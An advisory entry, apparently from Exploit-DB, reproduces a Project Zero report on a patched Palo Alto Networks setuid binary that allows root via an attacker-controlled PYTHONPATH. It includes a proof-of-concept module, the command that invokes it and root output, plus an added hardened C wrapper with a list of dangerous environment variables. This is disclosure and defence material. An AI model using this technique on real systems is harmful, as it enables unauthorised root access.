Vendor: N/A
By: Project Zero
CVSS: 7.2 (HIGH)
Type: Privilege Escalation
CWE: 264
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2014

setuid root executable /usr/local/bin/root_trace

The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) and then system("/usr/local/bin/masterd"), which is a Python script. Because the environment is not scrubbed, an attacker can point the PYTHONPATH environment variable at a directory containing a malicious Python module and then run root_trace to gain root privileges.

Mitigation:

The vulnerability was fixed by PAN in their security advisory: http://securityadvisories.paloaltonetworks.com/Home/Detail/67

Exploit-DB raw data:

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912

The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a Python script:

$ ls -l /usr/local/bin/root_trace
-rwsr-xr-x 1 root root 12376 Oct 17  2014 /usr/local/bin/root_trace

As the environment is not scrubbed, you can just do something like this:

$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);

$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)

This was fixed by PAN:

http://securityadvisories.paloaltonetworks.com/Home/Detail/67
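A hardened form of the wrapper described above, written for this entry as an added example (it is neither PAN's actual fix nor code from the Project Zero report): the privileged child gets a fixed environment and is exec'd directly rather than through system(), and a small helper audits an inherited environment for variables that redirect code loading. The DANGEROUS_NAMES list and all function names are assumptions of this example.

```c
#include <string.h>
#include <unistd.h>

/* Environment handed to the privileged child: nothing from the caller is
 * passed through, so a user-set PYTHONPATH cannot steer what masterd loads. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Audit list (constructed for this example): variables that redirect code
 * loading in the Python interpreter or the dynamic loader. */
static const char *const DANGEROUS_NAMES[] = {
    "PYTHONPATH", "PYTHONHOME", "LD_PRELOAD", "LD_LIBRARY_PATH", NULL
};

/* Returns 1 if a "NAME=value" entry names a variable in DANGEROUS_NAMES. */
int is_dangerous_env_entry(const char *entry)
{
    const char *eq = strchr(entry, '=');
    size_t len = eq ? (size_t)(eq - entry) : strlen(entry);
    for (int i = 0; DANGEROUS_NAMES[i] != NULL; i++)
        if (strlen(DANGEROUS_NAMES[i]) == len &&
            strncmp(DANGEROUS_NAMES[i], entry, len) == 0)
            return 1;
    return 0;
}

/* Counts dangerous entries in a NULL-terminated environment array
 * (pass `environ` to audit what a setuid wrapper inherited). */
int count_dangerous_env_entries(char *const envp[])
{
    int n = 0;
    for (int i = 0; envp[i] != NULL; i++)
        n += is_dangerous_env_entry(envp[i]);
    return n;
}

/* Hardened replacement for setuid(0); system("/usr/local/bin/masterd"):
 * exec the absolute path directly (no /bin/sh) with CLEAN_ENV only.
 * Returns -1 on failure; on success execve never returns. */
int run_privileged_script(const char *path)
{
    if (setuid(0) != 0)
        return -1;                   /* fail closed, never run half-privileged */
    char *const argv[] = { (char *)path, NULL };
    execve(path, argv, CLEAN_ENV);
    return -1;                       /* execve only returns on error */
}
```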